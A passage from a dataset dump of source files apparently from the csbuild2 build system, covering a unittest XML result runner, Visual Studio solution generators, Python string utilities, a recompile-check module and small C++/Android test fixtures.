errorDict[test]\n\t\t\t\tif test in skipDict:\n\t\t\t\t\tadd(case, \"skipped\").text = skipDict[test]\n\t\twith open(self.xmlfile, \"w\") as f:\n\t\t\tf.write(minidom.parseString(ElementTree.tostring(root)).toprettyxml(\"\\t\", \"\\n\"))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\n\tdef startTest(self, test):\n\t\t\"\"\"\n\t\tStart a single test\n\n\t\t:param test: The test to start\n\t\t:type test: TestCase\n\t\t\"\"\"\n\t\tsuper(TestResult, self).startTest(test)\n\t\tif test.__class__.__name__ != \"ModuleImportFailure\":\n\t\t\tself.timer = time.time()\n\n\tdef stopTest(self, test):\n\t\t\"\"\"\n\t\tStop a single test\n\n\t\t:param test: The test to stop\n\t\t:type test: TestCase\n\t\t\"\"\"\n\t\tsuper(TestResult, self).stopTest(test)\n\t\t# Python 3.5 changed from ModuleImportFailure to _FailedTest...\n\t\tif test.__class__.__name__ != \"_FailedTest\" and test.__class__.__name__ != \"ModuleImportFailure\":\n\t\t\tself.testList[test] = time.time() - self.timer\n\n\tdef addError(self, test, err):\n\t\t# pylint: disable=protected-access\n\n\t\t# Some syntax changes between python 2 and python 3 require us to make separate modules.\n\t\t# But the unittest system doesn't know about that and will try to import them. If it does it'll give us\n\t\t# this ModuleImportFailure. We have to detect this and selectively ignore it for those specific modules.\n\t\t# But ONLY for those modules.\n\n\t\t# Python 3.5 changed from ModuleImportFailure to _FailedTest...\n\t\tfrom .. import log\n\n\t\tsuper(TestResult, self).addError(test, err)\n\t\tlog.Error(self.errors[-1][1])\n\t\ttest.success = False\n\n\tdef addFailure(self, test, err):\n\t\t# pylint: disable=protected-access\n\n\t\t# See comment in addError above\n\t\tfrom .. import log\n\n\t\tsuper(TestResult, self).addFailure(test, err)\n\t\tlog.Error(self.failures[-1][1])\n\t\ttest.success = False\n\n\tdef printErrors(self):\n\t\t\"\"\"\n\t\tPrint errors. (Or in this case, don't. We did it earlier.)\n\t\t\"\"\"\n\t\tpass\n\n\nclass TestRunner(unittest.TextTestRunner):\n\t\"\"\"\n\tThin wrapper around TextTestRunner to allow passing an xml file to the result\n\n\t:param xmlfile: File to store the result xml data in\n\t:type xmlfile: str\n\tFor the other parameters, see unittest.TextTestRunner\n\t\"\"\"\n\tresultclass = TestResult\n\n\tdef __init__(self, xmlfile, *args, **kwargs):\n\t\tsuper(TestRunner, self).__init__(*args, **kwargs)\n\t\tself.xmlfile=xmlfile\n\n\tdef _makeResult(self):\n\t\treturn self.resultclass(self.stream, self.descriptions, self.verbosity, self.xmlfile)\n" }, { "alpha_fraction": 0.7727164626121521, "alphanum_fraction": 0.7796757817268372, "avg_line_length": 40.8708610534668, "blob_id": "4ecba8221f073bae1f3cd7906d9f2fc379f69dcb", "content_id": "0ea5f7086e54c6fa72b4530f432bdda2de4b403f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12645, "license_type": "no_license", "max_line_length": 125, "num_lines": 302, "path": "/csbuild/tools/project_generators/visual_studio/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: visual_studio\n\t:synopsis: Visual Studio project generators\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . import internal\n\nfrom .platform_handlers import VsBasePlatformHandler\n\nfrom csbuild._utils.decorators import TypeChecked\n\nfrom csbuild.toolchain import SolutionGenerator\n\nfrom csbuild.tools.common.msvc_tool_base import MsvcToolBase\nfrom csbuild.tools.common.tool_traits import HasDefines, HasIncludeDirectories, HasCxxLanguageStandard\n\n\ndef _writeProjectFiles(outputDir, solutionName, projects, version):\n\tgenerators = [x.toolchain.Tool(VsProjectGenerator) for x in projects]\n\n\t# Remove all generators that have no project data.\n\tgenerators = [gen for gen in generators if gen.projectData]\n\n\tinternal.WriteProjectFiles(outputDir, solutionName, generators, version)\n\n\n@TypeChecked(handlers=dict)\ndef UpdatePlatformHandlers(handlers):\n\t\"\"\"\n\tAdded custom platform handlers to the Visual Studio generator.\n\n\t:param handlers: Dictionary of platform handlers mappings to their build targets.\n\t:type handlers: dict[ tuple[ str, str, str or None or tuple[str] ], class ]\n\t\"\"\"\n\tinternal.UpdatePlatformHandlers(handlers)\n\n\n@TypeChecked(enable=bool)\ndef SetEnableFileTypeFolders(enable):\n\t\"\"\"\n\tHelper function to toggle the \"file type folder\" feature in the project generator.\n\n\t:param enable: Enable file type folders in the generated projects.\n\t:type enable: bool\n\t\"\"\"\n\tif isinstance(enable, bool):\n\t\tinternal.ENABLE_FILE_TYPE_FOLDERS = enable\n\n\nclass VsProjectGenerator(MsvcToolBase, HasDefines, HasIncludeDirectories, HasCxxLanguageStandard):\n\t\"\"\"\n\tVisual Studio project generator\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = internal.ALL_FILE_EXTENSIONS\n\toutputFiles = { \".proj\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\t\tHasCxxLanguageStandard.__init__(self, projectSettings)\n\n\t\tself._projectData = None\n\t\tself._sourceFiles = []\n\t\tself._groupSegments = []\n\n\tdef SetupForProject(self, project):\n\t\ttry:\n\t\t\tMsvcToolBase.SetupForProject(self, project)\n\t\texcept:\n\t\t\t# Do nothing on failure. This likely means something went wrong with trying to find\n\t\t\t# an installation of Visual Studio. Nothing is completely dependent on this, so it's\n\t\t\t# ok if it fails.\n\t\t\tpass\n\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\t\tHasCxxLanguageStandard.SetupForProject(self, project)\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tself._projectData = inputProject\n\t\tself._sourceFiles = [x.filename for x in inputFiles]\n\t\t# TODO: Once project groups are implemented, parse it for the current project and store the results in self._groupSegments.\n\n\t\treturn \"{}.proj\".format(inputProject.outputName)\n\n\t@property\n\tdef sourceFiles(self):\n\t\t\"\"\"Project source files\"\"\"\n\t\treturn self._sourceFiles\n\n\t@property\n\tdef groupSegments(self):\n\t\t\"\"\"Project group segments\"\"\"\n\t\treturn self._groupSegments\n\n\t@property\n\tdef includeDirectories(self):\n\t\t\"\"\"Project include directories\"\"\"\n\t\treturn self._includeDirectories\n\n\t@property\n\tdef defines(self):\n\t\t\"\"\"Project defines\"\"\"\n\t\treturn self._defines\n\n\t@property\n\tdef cxxLanguageStandard(self):\n\t\t\"\"\"Project C++ language standard\"\"\"\n\t\treturn self._cxxStandard\n\n\t@property\n\tdef projectData(self):\n\t\t\"\"\"Project settings data\"\"\"\n\t\treturn self._projectData\n\nclass VsSolutionGenerator2010(SolutionGenerator):\n\t\"\"\"Visual Studio 2010 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2010)\n\n\nclass VsSolutionGenerator2012(SolutionGenerator):\n\t\"\"\"Visual Studio 2012 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2012)\n\n\nclass VsSolutionGenerator2013(SolutionGenerator):\n\t\"\"\"Visual Studio 2013 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2013)\n\n\nclass VsSolutionGenerator2015(SolutionGenerator):\n\t\"\"\"Visual Studio 2015 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2015)\n\n\nclass VsSolutionGenerator2017(SolutionGenerator):\n\t\"\"\"Visual Studio 2017 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2017)\n\n\nclass VsSolutionGenerator2019(SolutionGenerator):\n\t\"\"\"Visual Studio 2019 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2019)\n\n\nclass VsSolutionGenerator2022(SolutionGenerator):\n\t\"\"\"Visual Studio 2022 solution generator\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects): # pylint: disable=missing-raises-doc\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\t_writeProjectFiles(outputDir, solutionName, projects, internal.Version.Vs2022)\n" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 6.5, "blob_id": "01f481e43cd7215cbac45d6c732feb41620ef4c0", "content_id": "fb3667f706b22deef21f72fd70534c341e6ced5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 31, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/functional_tests/explicit_sources_test/project/source/wrong/getnum.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\nint getnum()\n{\n\treturn 789;\n}\n" }, { "alpha_fraction": 0.5782642364501953, "alphanum_fraction": 0.5848508477210999, "avg_line_length": 26.747312545776367, "blob_id": "4f90b612e407fb15cac12643d435b0f0fec8aba9", "content_id": "92f5c641f66c8e23db96a9fbd5b5025f039e3c95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5162, "license_type": "no_license", "max_line_length": 88, "num_lines": 186, "path": "/functional_tests/android_test/hello_world/jni/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <EGL/egl.h>\n#include <GLES2/gl2.h>\n\n#include <android/input.h>\n#include <android_native_app_glue.h>\n\n#include <android/log.h>\n#define LOGI(...) ((void)__android_log_print(ANDROID_LOG_INFO, __FILE__, __VA_ARGS__))\n#define LOGW(...) ((void)__android_log_print(ANDROID_LOG_WARN, __FILE__, __VA_ARGS__))\n\nextern \"C\" {\n\nstatic EGLDisplay display;\nstatic EGLSurface surface;\nstatic EGLContext context;\n\nstatic void gles_init(struct android_app *android_app)\n{\n display = eglGetDisplay(EGL_DEFAULT_DISPLAY);\n eglInitialize(display, 0, 0);\n\n const int config_attribs[] = {\n EGL_RED_SIZE, 0,\n EGL_GREEN_SIZE, 0,\n EGL_BLUE_SIZE, 0,\n EGL_ALPHA_SIZE, 0,\n EGL_DEPTH_SIZE, 0,\n EGL_STENCIL_SIZE, 0,\n EGL_SAMPLES, 0,\n EGL_SAMPLE_BUFFERS, 0,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_RENDERABLE_TYPE, EGL_OPENGL_ES2_BIT,\n EGL_NONE\n };\n\n LOGI(\"EGL_VENDOR: %s\", eglQueryString(display, EGL_VENDOR));\n LOGI(\"EGL_VERSION: %s\", eglQueryString(display, EGL_VERSION));\n LOGI(\"EGL_CLIENT_APIS: %s\", eglQueryString(display, EGL_CLIENT_APIS));\n LOGI(\"EGL_EXTENSIONS: %s\", eglQueryString(display, EGL_EXTENSIONS));\n\n EGLConfig config;\n int num_configs;\n eglChooseConfig(display, config_attribs, &config, 1, &num_configs);\n\n int format;\n eglGetConfigAttrib(display, config, EGL_NATIVE_VISUAL_ID, &format);\n ANativeWindow_setBuffersGeometry(android_app->window, 0, 0, format);\n\n surface = eglCreateWindowSurface(display, config, android_app->window, NULL);\n\n const int context_attribs[] = {\n EGL_CONTEXT_CLIENT_VERSION, 2,\n EGL_NONE\n };\n eglBindAPI(EGL_OPENGL_ES_API);\n context = eglCreateContext(display, config, EGL_NO_CONTEXT, context_attribs);\n\n eglMakeCurrent(display, surface, surface, context);\n\n LOGI(\"GL_VERSION: %s\", glGetString(GL_VERSION));\n LOGI(\"GL_VENDOR: %s\", glGetString(GL_VENDOR));\n LOGI(\"GL_RENDERER: %s\", glGetString(GL_RENDERER));\n LOGI(\"GL_EXTENSIONS: %s\", glGetString(GL_EXTENSIONS));\n}\n\nstatic void gles_quit()\n{\n eglMakeCurrent(display, EGL_NO_SURFACE, EGL_NO_SURFACE, EGL_NO_CONTEXT);\n eglDestroyContext(display, context);\n eglDestroySurface(display, surface);\n eglTerminate(display);\n}\n\nstatic void gles_paint()\n{\n glClearColor(0.2, 0.4, 0.7, 1.0);\n glClear(GL_COLOR_BUFFER_BIT);\n\n eglSwapBuffers(display, surface);\n}\n\nstatic void app_cmd_callback(struct android_app *android_app, int32_t cmd)\n{\n (void)android_app;\n\n switch(cmd)\n {\n case APP_CMD_INIT_WINDOW:\n LOGI(\"APP_CMD_INIT_WINDOW\");\n gles_init(android_app);\n gles_paint();\n break;\n case APP_CMD_TERM_WINDOW:\n LOGI(\"APP_CMD_TERM_WINDOW\");\n gles_quit();\n break;\n case APP_CMD_WINDOW_REDRAW_NEEDED:\n LOGI(\"APP_CMD_WINDOW_REDRAW_NEEDED\");\n gles_paint();\n break;\n\n case APP_CMD_INPUT_CHANGED:\n LOGI(\"APP_CMD_INPUT_CHANGED\");\n break;\n case APP_CMD_WINDOW_RESIZED:\n LOGI(\"APP_CMD_WINDOW_RESIZED\");\n break;\n case APP_CMD_CONTENT_RECT_CHANGED:\n LOGI(\"APP_CMD_CONTENT_RECT_CHANGED\");\n break;\n case APP_CMD_GAINED_FOCUS:\n LOGI(\"APP_CMD_GAINED_FOCUS\");\n break;\n case APP_CMD_LOST_FOCUS:\n LOGI(\"APP_CMD_LOST_FOCUS\");\n break;\n case APP_CMD_CONFIG_CHANGED:\n LOGI(\"APP_CMD_CONFIG_CHANGED\");\n break;\n case APP_CMD_LOW_MEMORY:\n LOGI(\"APP_CMD_LOW_MEMORY\");\n break;\n case APP_CMD_START:\n LOGI(\"APP_CMD_START\");\n break;\n case APP_CMD_RESUME:\n LOGI(\"APP_CMD_RESUME\");\n break;\n case APP_CMD_SAVE_STATE:\n LOGI(\"APP_CMD_SAVE_STATE\");\n android_app->savedState = NULL;\n android_app->savedStateSize = 0;\n break;\n case APP_CMD_PAUSE:\n LOGI(\"APP_CMD_PAUSE\");\n break;\n case APP_CMD_STOP:\n LOGI(\"APP_CMD_STOP\");\n break;\n case APP_CMD_DESTROY:\n LOGI(\"APP_CMD_DESTROY\");\n break;\n default:\n break;\n }\n}\n\nstatic int32_t input_event_callback(struct android_app* android_app, AInputEvent* event)\n{\n (void)android_app;\n (void)event;\n\n switch(AInputEvent_getType(event))\n {\n case AINPUT_EVENT_TYPE_KEY:\n case AINPUT_EVENT_TYPE_MOTION:\n //return 1;\n default:\n break;\n }\n\n return 0;\n}\n\nvoid android_main(struct android_app* android_app)\n{\n (void)android_app;\n\n android_app->userData = NULL;\n android_app->onAppCmd = app_cmd_callback;\n android_app->onInputEvent = input_event_callback;\n\n while(!android_app->destroyRequested)\n {\n int events;\n struct android_poll_source *source;\n while(!android_app->destroyRequested &&\n ALooper_pollAll(-1, NULL, &events, (void**)&source) >= 0)\n {\n if(source)\n source->process(android_app, source);\n }\n }\n}\n\n}\n" }, { "alpha_fraction": 0.7278165221214294, "alphanum_fraction": 0.7382851243019104, "avg_line_length": 30.10077476501465, "blob_id": "25d42ea40e1f7569bb2007267b607cb7fcf485e8", "content_id": "8a335f75110d87dfd789bf73dc5d7fcc622c4be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 104, "num_lines": 129, "path": "/csbuild/_utils/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: _utils\n\t:synopsis: misc internal utility modules\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport math\nimport subprocess\nimport sys\n\nif sys.version_info[0] >= 3:\n\tBytesType = bytes\n\tStrType = str\n\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\n\n\tdef PlatformUnicode(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type unicode in python2 and str in python3.\n\t\t:return: unicode representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn PlatformString(inputStr)\n\n\tdef PlatformBytes(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in python2 and bytes in python3.\n\t\t:return: bytes representation of inputStr\n\t\t:rtype: bytes\n\t\t\"\"\"\n\t\tif isinstance(inputStr, bytes):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\nelse:\n\tBytesType = str\n\tStrType = unicode # pylint: disable=undefined-variable\n\n\tdef PlatformString(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in both python2 and python3.\n\t\t:return: str representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif isinstance(inputStr, str):\n\t\t\treturn inputStr\n\t\treturn inputStr.encode(\"UTF-8\")\n\n\tdef PlatformUnicode(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type unicode in python2 and str in python3.\n\t\t:return: unicode representation of inputStr\n\t\t:rtype: unicode\n\t\t\"\"\"\n\t\tif isinstance(inputStr, unicode): # pylint: disable=undefined-variable\n\t\t\treturn inputStr\n\t\treturn inputStr.decode(\"UTF-8\")\n\n\tdef PlatformBytes(inputStr):\n\t\t\"\"\"\n\t\tIn the presence of unicode_literals, get an object that is type str in python2 and bytes in python3.\n\t\t:return: bytes representation of inputStr\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn PlatformString(inputStr)\n\ndef FormatTime(totaltime, withMillis=True):\n\t\"\"\"\n\tFormat a duration of time into minutes:seconds (i.e., 2:55)\n\t:param totaltime: duration of time\n\t:type totaltime: float\n\t:param withMillis: Include milliseconds in output\n\t:type withMillis: bool\n\t:return: formatted string\n\t:rtype: str\n\t\"\"\"\n\ttotalmin = math.floor(totaltime / 60)\n\ttotalsec = math.floor(totaltime % 60)\n\tif withMillis:\n\t\tmsec = math.floor((totaltime - math.floor(totaltime))*10000)\n\t\treturn \"{}:{:02}.{:04}\".format(int(totalmin), int(totalsec), int(msec))\n\treturn \"{}:{:02}\".format(int(totalmin), int(totalsec))\n\n\nclass MultiBreak(Exception):\n\t\"\"\"\n\tSimple exception type to quickly break out of deeply nested loops.\n\t\"\"\"\n\tpass\n\n\ndef GetCommandLineString():\n\t\"\"\"\n\tGet the command line arguments used to invoke csbuild.\n\n\t:return: Command line arguments as a string.\n\t:rtype: str\n\t\"\"\"\n\treturn subprocess.list2cmdline(sys.argv[1:])\n" }, { "alpha_fraction": 0.7741098999977112, "alphanum_fraction": 0.7752888202667236, "avg_line_length": 41.40999984741211, "blob_id": "38508b2fc5c8aeb9589f003d4a7ecd7f725b2990", "content_id": "73c33cee11a8f8ac4ddc49fbbf30ba033c356c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4241, "license_type": "no_license", "max_line_length": 147, "num_lines": 100, "path": "/csbuild/_build/recompile.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: recompile\n\t:synopsis: Utility functions for checking recompilability of a file or files\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom . import project\nfrom .._utils import ordered_set, shared_globals, PlatformString\nfrom ..toolchain import CompileChecker\nfrom .._utils.decorators import TypeChecked\nfrom .. import perf_timer, log\n\ndef CheckCompilabilityForFile(buildProject, checker, inputFile, valueMemo, allDeps):\n\t\"\"\"\n\tCheck compatibility for a single file\n\n\t:param buildProject: Project being filtered\n\t:type buildProject: project.Project\n\t:param checker: Checker\n\t:type checker: CompileChecker\n\t:param inputFile: Input file to check\n\t:type inputFile: str\n\t:param valueMemo: memo to collect memoized values from\n\t:type valueMemo: dict\n\t:param allDeps: All processed dependencies for a given set of checked files used to avoid redundant processing when there are recursive includes.\n\t:type allDeps: set[str]\n\t:return: A value with a blocking Get() and not-blocking TryGet()\n\t:rtype: any\n\t\"\"\"\n\tif inputFile in valueMemo:\n\t\treturn valueMemo[inputFile]\n\n\twith perf_timer.PerfTimer(\"Non-memoized compilability check\"):\n\t\tvalues = [checker.GetRecompileValue(buildProject, inputFile)]\n\n\t\tdeps = {os.path.abspath(PlatformString(f)) for f in checker.GetDependencies(buildProject, inputFile)}\n\t\tdeps -= allDeps\n\t\tif not deps:\n\t\t\treturn values[0]\n\n\t\t# When using cached dependencies, some files may no longer exist. Such cases should be seen by the user as\n\t\t# an error during compilation, not an obscure Python exception because we're trying to check its timestamp.\n\t\tdeps = {f for f in deps if os.access(f, 